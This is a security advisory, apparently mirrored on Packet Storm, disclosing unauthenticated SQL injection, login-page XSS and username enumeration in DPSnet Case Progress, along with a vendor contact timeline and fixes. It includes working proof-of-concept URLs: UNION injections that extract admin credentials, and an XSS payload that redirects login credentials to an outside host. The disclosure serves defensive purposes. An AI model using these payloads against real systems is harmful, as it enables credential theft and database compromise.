what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ProCheckUp Security Advisory 2007.31

ProCheckUp Security Advisory 2007.31
Posted Oct 9, 2008
Authored by Adrian Pastor, ProCheckUp | Site procheckup.com

Remote SQL injection, cross site scripting, and user enumeration vulnerabilities exist in DPSnet Case Progress.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 0a2e10b125f92c734c445d338f2ce29f6235b3cd82345ce56eea2fbf2cda1c5d

ProCheckUp Security Advisory 2007.31

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

PR07-31: Unauthenticated SQL Injection, XSS and Username Enumeration on
DPSnet Case Progress

Vulnerabilities Found: 23 May 2007

Vendor Contacted: 10 July 2007, 31 August 2007, 17 September 2007, 12
December 2007

Note: the vendor stopped responding on 31 August 2007

Severity: Critical

Product description from vendor's site [1]:

"
Progress is an internet based product which enables all parties involved
in a matter, such as clients, work providers, estate agents, brokers or
solicitors to look up and track all matter details, including WIP,
accounting information, actions taken and the progress being made on all
case management files over the Internet, 24 hours a day, 7 days a week.

Through a link from your firms own website or the DPS website, all
parties can log on to Progress and view a report of each matter. How
much each party can view of the progressed details made on a matter and
then subsequently published to the Internet is strictly controlled by
the solicitor through a secure internet link.
"

Description:

Unauthenticated SQL Injection:

Client input is being used to generate queries passed to the backend
database server. This input is not sufficiently sanitized before being
passed to the backend database server. As a result, a malicious user may
be able to craft queries that will be run on the backend database server
without any authentication, leading to sensitive information such as
administrator passwords being retrieved.

SQL injection can have very serious consequences, such as the bypassing
of authentication, querying/modifying/adding/deleting data from the
backend database and the remote execution of programs.

NO authentication is required to exploit this vulnerability.

XSS on login page:

DPSnet Case Progress is vulnerable to a vanilla XSS within the
"password" parameter processed by the login server-side script. The
victim user does NOT need to be authenticated for this vulnerability to
be exploitable.

An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to DPSnet Case Progress.
This type of attack can result in non-persistent defacement of the
target site, or the redirection of confidential information to
unauthorized third parties.

Username enumeration:

The login facility available on DPSnet Case Progress allows attackers to
enumerate existing usernames through manual username-guessing and
automated dictionary attacks.

Attackers can feasibly guess valid usernames provided that usernames are
predictable (i.e.: [dictionary_word], [number]).

This kind of attack will most likely be launched by attackers who want
to identify administrative usernames that have elevated privileges on
DPSnet Case Progress.


SQL injection proof of concept:

The following request dumps the first username in the current table
(which appeared to be the admin user during a penetration test):

https://target.foo/progress/PasswordReminder.asp?ReminderButton=Submit&UserName='+union+select+min(Login.UserName),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+Login+where+Login.UserName>'a'--


SQL error returned (notice the username 'adminuser'):

"Syntax error converting the varchar value 'adminuser' to a column of
data type int."

SQL error returned (notice the password 'p4ssw0rd!!'):

https://target.foo/progress/PasswordReminder.asp?ReminderButton=Submit&UserName='+union+select+min(Login.Password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+Login+where+Login.UserName='adminuser'--


"Syntax error converting the varchar value 'p4ssw0rd!!' to a column of
data type int."


The following PoC script dumps usernames and passwords:

[removed]


XSS proof of concept:

Provided the victim is tricked to load the following URL, the
credentials would be sent to a third-party site (procheckup.com in this
case) when clicking on the login button.

https://target.foo/progress/?password=%22%3e%3c/form%3e%3cscript%3eloginform.action=%22http://procheckup.com/?%22;loginform.method=%22get%22%3c/script%3e%3c!--&



Username enumeration proof of concept:

Submitting an invalid username, i.e.:

https://target.foo/progress/default.asp?login=notvalidusername1&password=anypassword1&loginButton=Logon


Returns:

"The user name you have supplied is incorrect."

Providing a valid username, i.e.:

https://target.foo/progress/default.asp?login=validusername1&password=anypassword1&loginButton=Logon


Returns:

"Invalid password, please try again."


Affected Version: Unknown due to lack of response from vendor

Fix:

Unauthenticated SQL Injection fix:

Ensure all data originating from a client request is adequately filtered
before being passed to the back-end database server. Special characters
such as quotation marks, apostrophes, semi-colons and hyphens should
particularly be filtered. Follow a white-listing input validation
approach whenever possible.

Since there is no patch available from the vendor, it is recommended to
enforce password authentication at the web server level, so that the
vulnerable script cannot be probed by anonymous users.

XSS on login page fix:

Ensure all input is filtered sufficiently before being echoed back to
the client. In particular, characters such as left and right angle
brackets, quotation marks, apostrophes and ampersands should be
filtered. It is highly recommended to follow a white-listing input
validation approach whenever possible.

Username enumeration fix:

Change error messages so that attackers cannot determine if the username
entered already exists. i.e. "Authentication failure: username/password
combination is incorrect."

References:

[1] http://www.dpssoftware.co.uk/online.asp

ProCheckUp Security Vulnerabilities and Advisories:
http://www.procheckup.com/Vulnerabilities.php


Credits: Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)


Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is
attributed to Procheckup, and provided such reproduction and/or
distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFI7dBnoR/Hvsj3i8sRAlaNAKCjo1FpY+Yg1WN8tIfPdWTjbQy8EQCfX7O3
VBy3DtuAyBipynGXP6lqUU0=
=pZxv
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close